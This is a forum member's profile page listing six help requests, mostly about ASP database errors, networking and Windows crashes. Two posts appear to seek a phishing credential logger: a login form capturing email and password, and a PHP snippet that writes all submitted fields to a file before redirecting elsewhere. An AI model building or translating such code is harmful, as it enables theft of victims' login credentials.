Posts
 
Reputation
Joined
Last Seen
0 Reputation Points
Unknown Quality Score

No one has voted on any posts yet. Votes from other community members are used to determine a member's reputation amongst their peers.

0 Endorsements
~532 People Reached
Favorite Tags
Member Avatar for troy19

i have a login page (html) i need to transfer the username and the password to a text file using asp ... [code=html]<FORM method=post action=login.asp> <INPUT id=email class=inputtext type=text name=email> <INPUT id=pass class=inputpassword type=password name=pass> </form>[/code] i need this parametrs to be written in text file (notepad) using asp Thanks …

Member Avatar for chsab420
0
84
Member Avatar for troy19

i need to translate this php code to asp code ... : [code=php]<?php header ('Location: ****"); $handle = fopen("*****", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>[/code] thanks alot

Member Avatar for serkan sendur
0
25
Member Avatar for troy19

hey .... i have a problem when i try to update/delete/add to the database (microsoft access 2007) it gives me the error : Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80004005) [Microsoft][ODBC Microsoft Access Driver] Could not delete from specified tables. /internet project/delmsg.asp, line 7 LINE 7 is …

Member Avatar for troy19
0
61
Member Avatar for troy19

hey .... i have a problem when i try to update/delete/add to the database (microsoft access 2007) it gives me the error : Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80004005) [Microsoft][ODBC Microsoft Access Driver] Could not delete from specified tables. /internet project/delmsg.asp, line 7 LINE 7 is …

Member Avatar for Godsp3ed
0
75
Member Avatar for troy19

Hi ... first of all i have a router that connected to my main pc (Computer A) .. and i have another pc (computer B) which connected by wireless (usb flash) when i acess the workgroup by computer A to the computer B ... it says : \\(computer B) is …

Member Avatar for Kraai
0
207
Member Avatar for troy19

hey thank you for entering here .. i hope you would help me with this .... my problem is when i start windows it crashes immediatly and stucks so i do (ctrl+alt+del) to enter the task manager and log off the user .. and log on again and the windows …

Member Avatar for Rik_
0
80